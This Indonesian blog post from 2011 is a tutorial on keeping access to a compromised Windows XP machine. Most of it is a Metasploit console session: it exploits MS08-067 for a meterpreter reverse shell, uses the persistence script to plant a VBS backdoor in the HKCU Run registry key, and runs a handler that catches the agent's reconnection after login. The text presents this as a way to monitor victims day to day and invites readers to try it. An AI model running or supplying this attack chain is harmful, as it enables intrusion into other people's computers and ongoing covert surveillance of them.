Sabtu, 29 Oktober 2011

Dasar Maintaining Access (Pertahanan) : Metasploit

Sudah dijelaskan sebelumnya tentang gaining access ke meterpreter. Seperti di sini, sini, dan di sini. Banyak di temui user yang memang cerdas, dan dapat mengetahui kesalahan-kesalahan dalam komputernya, sehingga mereka menutup celah-celah keamanan (vunerable) dan hakerpun akan sulit memasukinya dengan metode yang sama seperti metode sebelumnya.

Mengapa harus dilakukan pemeliharaan akses? Hal ini dilakukan untuk memantau korban sehari-hari dan melakukan penelitian terhadap hal-hal yang dimaksuk oleh hacker tadi.

Dengan melakukan hal ini, hacker tetap bisa menerobos meskipun cara yang digunakan tidak sama dengan cara sebelumnya. Meterpreter telah menyiapkan script khusu untuk melakukannya supaya kita dapat berinteraksi dengan registry.
Langsung saja, setelah masuk meterpreter. Lakukan modul berikut:

[code]
root@bt5r1:~# cd /opt/framework/msf3/
root@bt5r1:/opt/framework/msf3# ./msfconsole 



                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##



       =[ metasploit v4.1.0-testing [core:4.1 api:1.0]
+ -- --=[ 747 exploits - 383 auxiliary - 92 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r13985 updated 5 days ago (2011.10.18)

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set LHOST 172.16.129.1
LHOST => 172.16.129.1
msf  exploit(ms08_067_netapi) > set RHOST 172.16.129.128
RHOST => 172.16.129.128
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.129.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.129.128
[*] Meterpreter session 1 opened (172.16.129.1:4444 -> 172.16.129.128:1235) at 2011-10-23 12:42:13 +0700

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L   Location in target host where to write payload to, if none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T   Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on the remote host where Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -U -i 5 -p 443 -r 172.16.129.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROOT-08DA1D7B75_20111023.4439/ROOT-08DA1D7B75_20111023.4439.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.129.1 LPORT=443
[*] Persistent agent script is 609731 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\zNIGCZocmGcl.vbs
[*] Executing script C:\WINDOWS\TEMP\zNIGCZocmGcl.vbs
[+] Agent executed with PID 3952
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ZRXNwNBmgYB
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ZRXNwNBmgYB
meterpreter > reboot
Rebooting...
meterpreter > exit
[*] Shutting down Meterpreter...

[*] Meterpreter session 1 closed.  Reason: User exit
msf  exploit(ms08_067_netapi) > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 172.16.129.1
LHOST => 172.16.129.1
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit

[*] Started reverse handler on 172.16.129.1:443
[*] Starting the payload handler...

Setelah user log-in

[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 2 opened (172.16.129.1:443 -> 172.16.129.128:1235) at 2011-10-23 12:47:13 -0600
meterpreter >
[/CODE]


Selamat mencoba . . :D




Sumber : In Here

Diposting oleh Tempat Share tentang IT di 00.06
Label:

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)